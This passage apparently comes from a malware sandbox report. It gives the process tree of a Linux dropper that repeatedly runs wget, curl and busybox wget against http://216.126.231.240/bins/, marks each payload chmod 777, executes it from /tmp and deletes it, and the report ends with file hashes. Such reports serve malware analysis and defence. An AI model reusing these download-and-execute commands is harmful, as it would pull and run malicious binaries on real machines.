/tmp/RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy./RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵
- Executes dropped EXE
PID:933
-
-
/bin/rmrm RBHjuyHUE7ZkAwccXoLwOlFElPpdzOJJyy2⤵PID:934
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:935
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:936
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:937
-
-
/bin/chmodchmod 777 DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- File and Directory Permissions Modification
PID:938
-
-
/tmp/DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj./DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵
- Executes dropped EXE
PID:939
-
-
/bin/rmrm DgSmxAB3KnQhhDhzA3vlYmtR7VTKsBj2Nj2⤵PID:940
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:941
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:942
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:943
-
-
/bin/chmodchmod 777 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- File and Directory Permissions Modification
PID:944
-
-
/tmp/3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI./3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵
- Executes dropped EXE
PID:945
-
-
/bin/rmrm 3h45mkKq53paqeqHO1U5dbSdglLFL7WGBI2⤵PID:946
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:947
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:948
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:949
-
-
/bin/chmodchmod 777 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- File and Directory Permissions Modification
PID:950
-
-
/tmp/6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh./6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵
- Executes dropped EXE
PID:951
-
-
/bin/rmrm 6GY91f6BLkopXfU2J29iq1MHcCPT0l9Unh2⤵PID:952
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:953
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:954
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:955
-
-
/bin/chmodchmod 777 RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- File and Directory Permissions Modification
PID:956
-
-
/tmp/RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD4./RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵
- Executes dropped EXE
PID:957
-
-
/bin/rmrm RIY20hbacMupGrncb3Ns3HpxMOVPqjgfD42⤵PID:958
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:959
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:960
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:961
-
-
/bin/chmodchmod 777 fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- File and Directory Permissions Modification
PID:962
-
-
/tmp/fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ./fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵
- Executes dropped EXE
PID:963
-
-
/bin/rmrm fXq0Jlw0itCrEQ1sbv5oHlsIw5arbvwqEZ2⤵PID:964
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:965
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:966
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:967
-
-
/bin/chmodchmod 777 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- File and Directory Permissions Modification
PID:968
-
-
/tmp/7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT./7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵
- Executes dropped EXE
PID:969
-
-
/bin/rmrm 7Z9b2XR0nLojCMWrsX9arzTKwCU8rx5oAT2⤵PID:970
-
-
/usr/bin/wgetwget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:971
-
-
/usr/bin/curlcurl -O http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:972
-
-
/bin/busybox/bin/busybox wget http://216.126.231.240/bins/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:973
-
-
/bin/chmodchmod 777 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s./3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm 3DqIIxL781ZSf1sfcwtT2YSXyj0IvH2B5s2⤵PID:976
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97